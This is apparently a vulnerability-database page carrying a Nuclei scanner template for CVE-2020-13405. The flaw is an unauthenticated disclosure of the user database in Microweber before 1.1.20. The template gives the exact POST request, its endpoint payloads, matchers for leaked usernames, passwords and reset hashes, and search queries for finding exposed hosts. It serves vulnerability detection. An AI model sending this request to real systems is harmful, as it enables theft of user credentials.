| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2020-13405 | 17 Jul 202017:31 | – | circl | |
| Microweber Information Disclosure Vulnerability | 19 Jul 202000:00 | – | cnvd | |
| CVE-2020-13405 | 16 Jul 202018:23 | – | cve | |
| CVE-2020-13405 | 16 Jul 202018:23 | – | cvelist | |
| Microweber Discloses Sensitive Information | 24 May 202217:23 | – | github | |
| CVE-2020-13405 | 16 Jul 202019:15 | – | nvd | |
| GHSA-PMXG-W9C7-FFMQ Microweber Discloses Sensitive Information | 24 May 202217:23 | – | osv | |
| Cross site request forgery (csrf) | 16 Jul 202019:15 | – | prion | |
| CVE-2020-13405: MicroWeber Unauthenticated User Database Disclosure | 14 Jul 202016:00 | – | rhino |
id: CVE-2020-13405
info:
name: Microweber <1.1.20 - Information Disclosure
author: ritikchaddha,amit-jd
severity: high
description: |
Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
remediation: |
Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability.
reference:
- https://rhinosecuritylabs.com/research/microweber-database-disclosure/
- https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6
- https://nvd.nist.gov/vuln/detail/CVE-2020-13405
- https://github.com/merlinepedra/RHINOECURITY-CVEs
- https://github.com/mrnazu/CVE-2020-13405
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-13405
cwe-id: CWE-306
epss-score: 0.13722
epss-percentile: 0.96048
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: microweber
product: microweber
shodan-query:
- http.html:"microweber"
- http.favicon.hash:780351152
fofa-query:
- body="microweber"
- icon_hash=780351152
tags: cve,cve2020,microweber,unauth,disclosure,vuln
http:
- raw:
- |
POST /module/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}admin/view:modules/load_module:users
module={{endpoint}}
payloads:
endpoint:
- "users/controller"
- "modules/users/controller"
- "/modules/users/controller"
matchers:
- type: dsl
dsl:
- 'contains(body,"username")'
- 'contains(body,"password")'
- 'contains(body,"password_reset_hash")'
- 'status_code==200'
- 'contains(header,"text/html")'
condition: and
# digest: 4a0a0047304502202df64f78ba2f1e30f37656d11bcfc4a7d0fb3d8ab0ab08bd4ca99e227ee02c95022100e7e6883925538e121cc6d420e45107b7eac6cb2a3abcb208579ddd1d55b299f7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation